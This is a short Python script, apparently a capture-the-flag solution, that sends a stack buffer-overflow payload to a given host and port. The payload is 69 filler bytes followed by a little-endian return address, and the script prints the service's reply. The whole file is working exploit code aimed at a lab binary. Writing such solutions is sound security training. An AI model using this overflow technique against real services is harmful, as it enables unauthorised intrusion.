#!/usr/bin/env python3

import socket # dealing with internet connections
import argparse # pass arguments when calling the script so we can use it for any other CTF challenges
import struct # for changing the memory address into Little Endian.

# Build out the arg parser and args to take in
parser = argparse.ArgumentParser()
parser.add_argument(
    "host",
    type=str,
    help="The hostname or IP address to connect to"
)
parser.add_argument(
    "port",
    type=int,
    help="The port for the service to connect to"
)

args = parser.parse_args()

# for testing
print(args.host, args.port)

# Swaps the memory address to Little Endian for us
ip = struct.pack("<I", 0x08048486)

# 69 here represents the offset + 1
payload = b"".join(
    [
        b"A" * 69,
        ip
    ]
)
# Add the bytes for a newline to mimick pressing the "Enter" key
payload += b"\n"

# Takes care of closing the socket
with socket.socket() as conn:
    conn.connect((args.host, args.port))
    # print(conn.recv(4096).decode("utf-8"))
    conn.send(payload)
    print(conn.recv(4096).decode("utf-8"))